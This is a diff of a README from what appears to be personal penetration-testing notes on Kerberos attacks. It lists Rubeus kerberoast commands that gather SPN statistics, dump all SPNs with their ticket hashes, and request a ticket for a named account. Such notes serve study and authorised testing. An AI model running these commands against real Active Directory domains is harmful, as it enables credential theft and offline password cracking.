kiro6/penetration-testing-notes/Penetration Testing/Kerberos attacks/README.md

 # Using the /stats Flag (get SPNs count , encryption types and latest change date)
 .\Rubeus.exe kerberoast /stats

+# get all spns and hashes
+Rubeus.exe kerberoast

 # get ticket (we can see the supported Encryption type also)
 .\Rubeus.exe kerberoast /user:testspn /nowrap